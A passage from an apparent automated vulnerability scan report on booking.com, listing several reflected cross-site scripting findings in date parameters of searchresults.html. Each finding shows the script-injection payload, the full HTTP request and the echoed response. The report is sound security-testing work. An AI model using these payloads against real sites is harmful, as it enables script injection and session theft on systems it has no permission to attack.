Cq%2FLENg5StfG3pw%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:13:27 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 385978
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
<a target="_blank" title="Forgotten your password?" href="https://secure.booking.com/login.html?op=remind;lang=en;go_back_url=http://www.booking.com/searchresults.html?aid=335591d852f"><script>alert(1)</script>9c61548c4a4&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign
...[SNIP]...
4.212. http://www.booking.com/searchresults.html [checkin_monthday parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the checkin_monthday request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abb50"><script>alert(1)</script>b96c0c3da70 was submitted in the checkin_monthday parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04abb50"><script>alert(1)</script>b96c0c3da70&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:16:27 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YdN864bAdMj5F%2B8LyEAy9%2BENkbBkfkD3xlqEYJetszTSFEJ5opEtwKeeSIw3ngok9G03LHThCOjdxnGEeKkVBMwECBsqWm7cVMlbsTgQgwdSwOKMvNqfQgB7Y2yvJRNqgUqYzp%2F9HjZruDNc5YU5dH%2BK%2Fqs3t4%2B9XVw9K3X9h7hr6p1aX83FOmGifdGyY%2F%2FtlcdFYg3UfSOoOLYRBAdcJwHMC4eLyr9LfMSZ2S2lfiVFu9rZF4wfI0jXZ3MktJrkHso%2B5YD1LtPkJlIcqmDeNskdO7GOr%2Fp186o63Z2ECsPNKEPPwoIOUuny2N66k7b9UBesmgcCDMloBYqIg4nT6M%2F0O5zlVZzHPn2yPBH14eb94AU%2FBv79eo6j80yaSt89bbyoQby2wZ96PwIJJMMGS%2FolOAXe8XVmlXdeFhvRZbnbYGq3RAKOd8e4kSr6Na2VWopkhGzvcGu%2FVVuey0hYlTxzBG5MuUSsB1paTCqSqKhas1hp9lz2AU1NSAUOiT1gKnmU0WcwhPMgPT6xdhlJl5GQurjXgvORt6fXwo7hkDxnPopCISzrf9ZhSeCA1GLi%2Fb78gLmhVYqRc63xhFYfdAHr2lsxwJO0GUfPwuxjc06Z7VmdXEK6wy%2F%2F%2F5YAg5dbYdafrwZs22Il3auQHl%2BUf0SzZQ1S9F1q3jIdCkOSQ1Bfnw%2B6rVP0jfnbzfWrOy%2Ba7I%2F1bGHphkuDGpYzvBLQN7Fix1U9k6Ci0C9lShF4Jb8q5dgV04%2B69yXSG%2Fmdz9zX1FTzNajPHkleHI2KQZ8zabdpiOfc%2FPtei11Wqu%2BqWGFs7ZUxLBf5xdsuUWK9qn8B0a1PUk7OpLjRwBCz9nMrs37QC24FzlcbOueZ0ykEycGrFHzMFySV%2F9JGT1erbm90r70evUO9RbCwoCc19g4KQ%2BRdTi0DwCZh7gbd12Tj%2BArLgtLnzxeiOzpdO5vkVB249mCUffXt0o0M7zyv3flSw%2FDg6dN9Yy2xftATILQsO%2Bi3oUB1ePwkY1xtge5gwi4AC0zb3AO3KUjnfjijj4NO1y%2BLuQW0tyjUBrTMHmQfn4tW62yQkYIf0kA3xhQe5k6bR2AdEo0GLRFnWfJjFrCXrliOZ7ffdcK3Ce3Fl3LJe59JFZLr6I6UpJtbM1yElbzWMNzPCgId6NYHks6dyGfKi5hdGuFyjnyjDkZhvtt%2BcfO5Ge1kD778a9P6jpEwNWlkfBvJLlcxpkI1hN%2FkKDWwRbSb6vdFn4Hlf9t48e%2B6o7wXNCU1PN7Vuou81NSpGnQHHoclX7sKMJlS2TFdHJneAaNnxOZHz9lQp1Z%2F1rI%2FuXS3uij99DoGiyWPtAa9oioI%2F6%2BTe3To%2FXxKZW2LBYUM%2FOpfDmboGN7%2FLLdzwGWomth2JBDqLu6xO3l%2BgQdxOwGy3zlbNeFySGo7B%2FW6pv8m50%2FzgpvrHUbPz02F7yQmxOqvNcalNMUvR0FVcrTcWQCRtw%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:16:27 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 278498
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_se
...[SNIP]...
your password?" href="https://secure.booking.com/login.html?op=remind;lang=en;go_back_url=http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04abb50"><script>alert(1)</script>b96c0c3da70&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717">
...[SNIP]...
4.213. http://www.booking.com/searchresults.html [checkin_monthday parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the checkin_monthday request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 831ef</script><script>alert(1)</script>c56720788c0 was submitted in the checkin_monthday parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04831ef</script><script>alert(1)</script>c56720788c0&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:17:55 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YVuoakmCuggKVBk4dVUHfDVnewdIvAmgoL0tSDTgFt9zgdISpAL9zaHjp6X9Iy1Q%2BUur%2B%2FRf37bFsaJsXw908W4diQTtTz13fHFhiEf%2FmLPYV%2FFGUzga5TwTyRd7Zqi5YdeROYvwI09F7R%2BHenmuEuJcMR%2FnFxXN%2FRAMEqLwczMSu34en%2FtI3AeEAtwK%2BBHe7jzOabclaj5UiseUxH3%2B6POt6jcGBLpsrYHQBSrxdHkAIY9CjOLB%2FbW6pDR0cPFb1Za3Vt022IKEwCF6AZ3n4zWvOKJs8BVmyo1ck5vPnPE4j9INed765odKzPMz5u1oFAl%2FpGd7isYZrIQNeSQ2u6CQhaSh%2FiKhyqvUBcnbv77xDHmzZPM6uA%2FULLH82QUtuW1MA8%2Fe8Lxz%2BzC8Jpn9eWSNdd3YOQOExP4JHg0ZTwPq5ygvygKvnyNngGlJmX8AvpISLdaJLPBuHKAFM4mLCx164EFuXFeLXLFI4Y8%2BFz7sDavEPeX2A6G0LKkMybTIU6VqU4Eb6QV5efi1fQI1pV4w8Ud3z%2FdyDcTZDOfCzXjnPvD%2BPekw0LLvFmUN88qQloqwt6aSzpTNcLwH8q93J9En2%2FAEWmlhiancoHjmEr9gFyYfgt7%2BKjTYAfeKfU4A%2BcXIq%2BxeayxrIPKurH6O8EIwdXr0YvAMdjjDEjRoj4RJ7Du%2FFwI0p%2BWoDDrz4mn2JbCfObAyCb%2BVVYak5pJqw2Hp68M6fEOKCVGT9E5Cz6DeT2rVyT5EfIogClFHau8pHoDDRK%2F%2FrLF6zfhuDNvHiI79UN%2F44ZPwOnf9cEAHHdvHV%2Fw0Ln60jq9qAgvHMs5y6xII9yg%2F2BJbGt%2Fhk8DoeNjse3WJBOaQZj5RKKkUKHuoVzkt4nlNSmfjDO7HkXtFfASCQr6eTanvfzRBBK%2Bc3LxB5K0UK1fwe%2Bx1D4zWF99eqTh6tlNgeSjBuxI85Z9HFRebeDaV6%2BhlXRnc%2BNwzDSm%2BbEwBFRFE61mYpf9zBnf0xEJCKV70IxteV6YFgjfqvBjU3vY7f591%2FxPzpqad8T3OTLrlr8SIbBoNN4P9esRp8HhSsV2KHUymQVyhn%2FoqmC8DlmdD2RX4QizimqbQH3pwa9Zo46DcmglZQSZwCmCjAF5mBHM1ee9qhOnPNQhkId%2BiIaDmSWW3AJTdzT8t8AXHLXAwtDlshe2CLBOc%2BCHU9NI9PDQECjY%2F6JybHpM6x4K8sCyLhVuBRThTso1FY3xVef%2BXOD8qCDD6qErLoFORugtbq9tNqEt2lO5YZDcYB6AiyVMiafC8qBvvYqMaysVH4bGUVnwuV89xiL7WadP47KXZYAHtqVxOAzN9D70UiKvwhh%2FwpQbV62m0dJ5OvFotr7vkn7giglsjwZlKJ8iR6%2BjkRxjDpPsqQlE5MBTCjQoy8qHps13Nh655VfWxkV6haJpW4S2k8A%2BFkUMeMB3TIcBhzjFpgfW43LxTOeGt5g%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:17:55 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 278343
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_se
...[SNIP]...
_text',
locale_for_facebook : 'en_US',
b_domain_end : '.booking.com',
b_original_url : 'http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04831ef</script><script>alert(1)</script>c56720788c0&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717',
b_this_url : '/searchresults
...[SNIP]...
4.214. http://www.booking.com/searchresults.html [checkin_year_month parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the checkin_year_month request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4609</script><script>alert(1)</script>364dfd52e62 was submitted in the checkin_year_month parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10a4609</script><script>alert(1)</script>364dfd52e62&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:20:10 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDPZ3nY%2BK7rx45hTbiDc3NR0kCPIILsWbZor2CD1FfGdefKUJXrZ4LhRultf9wi7%2BBa4wA0Xe8rEPXdTrlS%2FC0RK7AO5KfnttTKjvmtmvVwWpdPdWObiTxe4HCNrATsB%2BO94lOYlLkRFNr70z1Ak%2BQv0QrAV%2BxSnxb3kGHQ9RQAyC5eEO4DoEW5qabbtFoys%2B5YUzPOF0G4ywfhPoLkxs4o6siwicUER1s%2B7m3%2F3T28oSg5ZBm7%2FhJVDniS3vYikVDGMQHZaaLz5%2BX4tWdffY3u0pGx73WGbA0lO7sz%2FHSfljBz4lzoeTyeQ7eaQAu4O0X0wHNgjA2ARPQqRA7DqUSkQKi34Qt%2Big81Y%2BrcUjsnjLojuflJVjXQuTZxYrFh%2FtXnS7d%2FKMT7sWqIrBjfmGyQCnWEWAWe74XOnHMcAjnMhOkuw7rBe%2BN0D5hfSIa4oHjmHGdizMwGD139%2BCnqkhLRWPcYO%2F5sGp%2FLMXs93Jq7oM%2BYMSTh6as7RQicH7PWVk8AxV%2B5vvq%2FaD8082Ulv5kFO6HBvHALEvlDB%2BSs09p%2F8loH349D0eBNpYfBmvcvJxaik4Mqa1tGGxeEiQUk2Lrswnx64Eh4TSwXGFJW5IpQtLpktpVz05EapxtC474y8Xte%2BxGL1gzHlMbqweb1cQwcQGaALgdI39SeZfFBIs%2FPqLCkNHDQ5Cgb6nJIEGJxVZT27hW4%2BXYa9CwMh4NXXED3JwBCJHvT2lpOrU8qrkK%2ByfUXXlyw5lGKLsS09A0jiJSb%2FTWV5Id79DmQzsRRafZGDwjphRp9NmpzyRoFczXiiKRJR0Zm0ECjOUo5O7NUhUaTw9%2BV7MuycYaFvNK4rED87aIuVp1nA4vRFppbUSxT0asrvJfGgcsYPrGZiYAKqTl8qDWb%2BRuqwZ3gN%2FhqNoRFXpsM6NQi7TBRe1BNby8JPgdFRYGPRchTeOiESe%2F2u0eOOz%2FhyvBV9hqc2amYf%2B7pKrPKSFiL9j62XsJSynfZADZODPZqgAfeQe0%2B1n%2FM3Nf%2FgXB2BfpDoMfTAoIXDD%2B2zpy1GZ0aKfwZc5%2Btcf%2FnLwKHqtMoQWHQCny%2BLQ8EM%2FsU01FuSaI2gM%2BiQ5sg54OYuaxZ15EAnq9CpJ%2F6kJL5%2BWEJyqIWgXDcRuVTekXmEZ2Gtr02eUbrpR5Qe2aVzyX53tikhW9K1dkSfDqOK%2FewU80i%2FeTqzN29f5FnjAG%2FZK%2BE1MCQqvUQV%2F6wHpA1VptLqcCLY4vCZRVcs6QMCMMb025k0Fgh2fhN4wYgSRshaCiuAa%2FlzK%2Bfk%2FAQl%2FxDc24ACcyUL2Sn0whzY3aJgNuYdGp457tXZ626rLcHf744BVF5YVIHoheUTNsVr0zV4EqnvNWYYjI8dmLiaCU3KkgcWyjoIwoil3eDWhSlTu6Y2tU4SdXYLLw1rX8JBf3N8On%2BAfJaOp%2FVTWXzOTYo0QiQWSQfwIBNi7aiA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:20:11 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 276908
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_se
...[SNIP]...
k : 'en_US',
b_domain_end : '.booking.com',
b_original_url : 'http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10a4609</script><script>alert(1)</script>364dfd52e62&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717',
b_this_url : '/searchresults.en-us.html?aid=335591;labe
...[SNIP]...
4.215. http://www.booking.com/searchresults.html [checkin_year_month parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the checkin_year_month request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3bff"><script>alert(1)</script>baf172468a was submitted in the checkin_year_month parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10f3bff"><script>alert(1)</script>baf172468a&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:18:52 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YdN864bAdMj5l%2FLffaPyJHXu4q2%2BdoR5Iz0oavHU2rGisCrR42YpPIjedvMSIvnPbufaWP5YiCyeKFOhfiPW1L2dsrmzNmkmplzXnm9y%2BhF11lYWw2HnoP5JmCp%2FP6bNuIQRCLLwramikxQrRTcScO0q%2FQb2CeYiov0Odn7qD%2FdE5my4OGedYO47IvhCyxJVSa101qzR5SKjnuKMgZJfVGl6m1Kl6wC%2F%2FvEGchgxQN8LbXGHagbI8Tqv1je1npYwGWKCocPKIfldPMuGUSMtgM54n6j21kukoIp14B7JCljJxsV5GryNeyG%2BaAsAWGlvQTE8487N69tLBosvMZEdiNdCCAUvfzNSiGnp%2Fm1TN9JhfxaRaGKeMNmLTVN4vnxJhhuPPSBpB%2FnP7innGo%2Ffqonjph8QVMf5LpBBI26UK%2FbdozyrZhp0Z7DBLE1Ik9l8p7GOFHE6jXLNsPZeTQSeRFxWg4UVsHT2DoDTfSM9MtnUiEOBKoTKdwFdhUJTRUkTX3VPYO9TpN%2F%2FNjRXKjaJrQuOPdViHN10jhta%2Bv2gVO%2FU%2F%2Fq%2BKW0%2BWHzaDhy7vcjDKAitEgB2i%2FFMdGE9cYOgDWnLV%2F0Ofbq1Pi91dq0GE3riH12e1Jq1AYuUcB1N2p8Z%2BRumfNHznEre7MbZjugWZl4Og%2FUVG6no7%2F6e1eAc3ei0eJ4ntzgF2vZRD1eQkhJyabtqG8GHEgx42UqFAsS6oYClL7Gh2LSGEkxlBBkB0T5gatTRevfQHi9nNYe5tsUA9mdeJXp6yntAOIHUVGYBV4%2BSvAeVnTdvw9lbNnw%2FeG6J25ZgflZyhW8fa69VwbR7QdD76tTmu5dDmRXWQ%2BjDxiaqpLZTCzTZ2lq2LHE%2Fx2nnRH2SGQUY4FEVnWyWl8%2BR0Uh1c2lAN56yNkD0e38RN8hXSeeVDhdxvDM%2FYtTQx%2B0MSiEcweAlkR0BlD6AvFmJNvuQPbLaOMafcB%2Bl89J6jlTn02QuI%2B0Dp0C%2BEos%2BDEC7da293k49UabVZdVPEiQkUsvxP7oicqn%2B90nYxIqdMp6hK%2BTp6eyJ%2FK7UONqCUxMytL96ojNyE7ZY2YI6%2Bnxkdlv2vTIzHbOOo2fQwfryxbaX0u3fDYP%2F33FGi7fppwfbzj8DiVSHCOe8qtaAVMWv2el3thWW5aCNAEHE9OZ5l4ZhV2g98I3LVyG78zSKGv7yM%2BlF9i637ijsYMd%2B2CIyZw%2F1aJeAT3Gw5CeKnVDkQtCbyU%2B9Ejar4R%2FzsKRxAG%2FFWkpjpYk2XV0tH%2BRynnHnPUktTxSu1J4jBrlQBkRZzbwQaS68DHP6UnQrSv5IF3gchRRpfMR9WPBMPgZ9XI1N%2FHZXt1NN6GfV8VGdKnW%2BHA4Jce7GCm8fCTVRA7mYEF7Yl9a2iLjnu8ORQJ%2F9jPkAus1yAwrIpMiihqxLzcsbnf3VvqADIyR4ZVwZ4fMTWE%2BtFOXYPCO8SQRmaicvBOZqOQ%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:18:52 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 277061
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_se
...[SNIP]...
